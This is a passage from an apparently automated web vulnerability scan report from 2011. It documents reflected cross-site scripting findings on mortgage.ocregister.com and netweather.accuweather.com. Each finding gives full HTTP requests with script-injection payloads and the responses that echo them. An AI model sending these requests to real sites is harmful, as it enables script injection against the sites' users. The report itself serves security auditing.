Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css92232\"><script>alert(1)</script>8606eb47764feed/" />
...[SNIP]...

4.397. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" />
...[SNIP]...

4.398. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/democracy.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" />
...[SNIP]...

4.399. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" />
...[SNIP]...

4.400. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/themes/onSet/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" />
...[SNIP]...

4.401. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" />
...[SNIP]...

4.402. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/wlwmanifest.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" />
...[SNIP]...

4.403. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" />
...[SNIP]...

4.404. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:56 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Thu, 03 Feb 2011 17:13:56 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
Type;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";alert(1)//bc4341ec3d3&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";ale
...[SNIP]...

4.405. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:57 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN)
Cache-Control: max-age=3420
Expires: Thu, 03 Feb 2011 17:13:57 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale
...[SNIP]...

4.406. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:10 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3300
Expires: Thu, 03 Feb 2011 17:14:10 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
edAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";alert(1)//1ba13126b12&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";ale
...[SNIP]...

4.407. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:21 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3060
Expires: Thu, 03 Feb 2011 17:07:21 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale
...[SNIP]...

4.408. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:38 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:09:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale
...[SNIP]...

4.409. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:31 GMT
